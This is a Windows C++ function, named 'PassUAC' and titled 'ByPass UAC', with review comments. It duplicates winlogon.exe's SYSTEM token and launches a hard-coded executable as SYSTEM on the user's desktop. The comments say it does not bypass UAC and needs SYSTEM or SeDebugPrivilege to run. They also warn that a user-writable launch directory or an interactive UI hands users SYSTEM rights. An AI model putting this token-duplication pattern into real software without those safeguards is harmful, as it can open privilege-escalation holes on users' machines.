ByPass UAC (misnamed: the code below duplicates winlogon.exe's SYSTEM token and launches a process in the console session; it only works when the caller already runs as SYSTEM or holds SeDebugPrivilege, so it does not cross the UAC boundary)
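// Starts C:\SessionLauncher\a.exe on the interactive console desktop
// (winsta0\default) with a primary token duplicated from the console
// session's winlogon.exe, i.e. as LocalSystem.
//
// NOTE(review): despite the name, this does not bypass UAC. OpenProcess on
// winlogon.exe (a SYSTEM process) only succeeds when the caller already runs
// as SYSTEM or holds SeDebugPrivilege (typically a service), so the caller
// must already be above the UAC boundary. This is the usual "launch a process
// in the logged-on user's session from a service" pattern.
//
// Security caveats for anyone deploying this:
//   - The child runs as SYSTEM on the user's desktop. Any interactive user can
//     drive its UI, so a.exe must not expose file dialogs, shell-outs or other
//     primitives a standard user could turn into SYSTEM-level actions.
//   - The launched path is hard-coded. If C:\SessionLauncher is writable by
//     non-administrators, a user can replace a.exe and obtain SYSTEM; verify
//     the directory's DACL before relying on this.
//
// Returns TRUE when CreateProcessAsUser succeeded, FALSE on any failure. (The
// original returned 0 unconditionally and 1 only on snapshot failure, which
// inverted the BOOL meaning; bResult was computed but never returned.)
//
// Fixes relative to the original: winlogonPid was uninitialised when no
// matching winlogon was found; hSnap, pEnv and the child's process/thread
// handles leaked; OpenProcess/OpenProcessToken/DuplicateTokenEx failures were
// not fatal; SetTokenInformation received the session id value cast to a
// pointer instead of a pointer to it; a LookupPrivilegeValue failure still
// adjusted privileges with an uninitialised LUID; WTSQueryUserToken's handle
// was never used and was closed even when the call had failed.
BOOL PassUAC()
{
    // Minimal RAII wrapper so every early return releases its handle.
    struct ScopedHandle {
        HANDLE h;
        ~ScopedHandle() {
            if (h != NULL && h != INVALID_HANDLE_VALUE) {
                CloseHandle(h);
            }
        }
    };

    // Session the physical console is attached to; 0xFFFFFFFF means none.
    const DWORD dwSessionId = WTSGetActiveConsoleSessionId();
    if (dwSessionId == 0xFFFFFFFF) {
        printf("No active console session\n");
        return FALSE;
    }

    //
    // Find the winlogon process that lives in the console session.
    //
    DWORD winlogonPid = 0;
    ScopedHandle snap = { CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) };
    if (snap.h == INVALID_HANDLE_VALUE) {
        printf("CreateToolhelp32Snapshot Error: %u\n", (unsigned)GetLastError());
        return FALSE;
    }
    PROCESSENTRY32 procEntry;
    procEntry.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(snap.h, &procEntry)) {
        printf("Process32First Error: %u\n", (unsigned)GetLastError());
        return FALSE;
    }
    do {
        if (_tcsicmp(procEntry.szExeFile, _T("winlogon.exe")) == 0) {
            DWORD winlogonSessId = 0;
            if (ProcessIdToSessionId(procEntry.th32ProcessID, &winlogonSessId)
                && winlogonSessId == dwSessionId) {
                winlogonPid = procEntry.th32ProcessID;
                break;
            }
        }
    } while (Process32Next(snap.h, &procEntry));
    if (winlogonPid == 0) {
        printf("winlogon.exe not found in session %u\n", (unsigned)dwSessionId);
        return FALSE;
    }

    //
    // Open winlogon's token and duplicate it as a primary token.
    // OpenProcess here is what requires the caller to already be privileged.
    //
    ScopedHandle process = { OpenProcess(MAXIMUM_ALLOWED, FALSE, winlogonPid) };
    if (process.h == NULL) {
        printf("OpenProcess Error: %u\n", (unsigned)GetLastError());
        return FALSE;
    }
    ScopedHandle pToken = { NULL };
    if (!::OpenProcessToken(process.h,
                            TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_DUPLICATE
                            | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID
                            | TOKEN_READ | TOKEN_WRITE,
                            &pToken.h)) {
        printf("Process token open Error: %u\n", (unsigned)GetLastError());
        return FALSE;
    }
    ScopedHandle dupToken = { NULL };
    if (!DuplicateTokenEx(pToken.h, MAXIMUM_ALLOWED, NULL, SecurityIdentification,
                          TokenPrimary, &dupToken.h)) {
        printf("DuplicateTokenEx Error: %u\n", (unsigned)GetLastError());
        return FALSE;
    }

    // Bind the token to the console session. SetTokenInformation takes a
    // pointer to the DWORD; the original passed the value cast to void*, so the
    // API was handed an invalid buffer address and the call could not succeed.
    // Kept non-fatal as in the original: a token taken from this session's
    // winlogon is normally already in the right session.
    DWORD tokenSessionId = dwSessionId;
    if (!SetTokenInformation(dupToken.h, TokenSessionId, &tokenSessionId, sizeof(tokenSessionId))) {
        printf("SetTokenInformation Error: %u\n", (unsigned)GetLastError());
    }

    //
    // Enable SeDebugPrivilege in the duplicated token. This only affects the
    // child process; it does nothing for the OpenProcess call above.
    //
    LUID luid;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {
        printf("Lookup Privilege value Error: %u\n", (unsigned)GetLastError());
    } else {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luid;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        if (!AdjustTokenPrivileges(dupToken.h, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
            printf("Adjust Privilege value Error: %u\n", (unsigned)GetLastError());
        } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
            // AdjustTokenPrivileges returns TRUE even when it could not enable
            // every requested privilege; the last-error code is the only signal.
            printf("Token does not have the provilege\n");
        }
    }

    //
    // Build the child's environment from the token; fall back to inheriting
    // ours (pEnv == NULL) if that fails.
    //
    DWORD dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;
    LPVOID pEnv = NULL;
    if (CreateEnvironmentBlock(&pEnv, dupToken.h, TRUE)) {
        dwCreationFlags |= CREATE_UNICODE_ENVIRONMENT;
    } else {
        pEnv = NULL;
    }

    //
    // Launch the process on the interactive desktop.
    //
    STARTUPINFO si;
    ZeroMemory(&si, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    TCHAR desktop[] = _T("winsta0\\default");  // lpDesktop is a non-const LPTSTR
    si.lpDesktop = desktop;
    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    BOOL bResult = CreateProcessAsUser(
        dupToken.h,                        // duplicated SYSTEM token
        _T("C:\\SessionLauncher\\a.exe"),  // file to execute (see DACL caveat above)
        NULL,                              // command line
        NULL,                              // process SECURITY_ATTRIBUTES
        NULL,                              // thread SECURITY_ATTRIBUTES
        FALSE,                             // handles are not inheritable
        dwCreationFlags,                   // creation flags
        pEnv,                              // environment block, may be NULL
        NULL,                              // current directory
        &si,                               // STARTUPINFO
        &pi                                // receives process/thread handles
    );
    if (!bResult) {
        printf("CreateProcessAsUser Error: %u\n", (unsigned)GetLastError());
    } else {
        // The child is not tracked; drop our references so they do not leak.
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    if (pEnv != NULL) {
        DestroyEnvironmentBlock(pEnv);
    }
    return bResult;
}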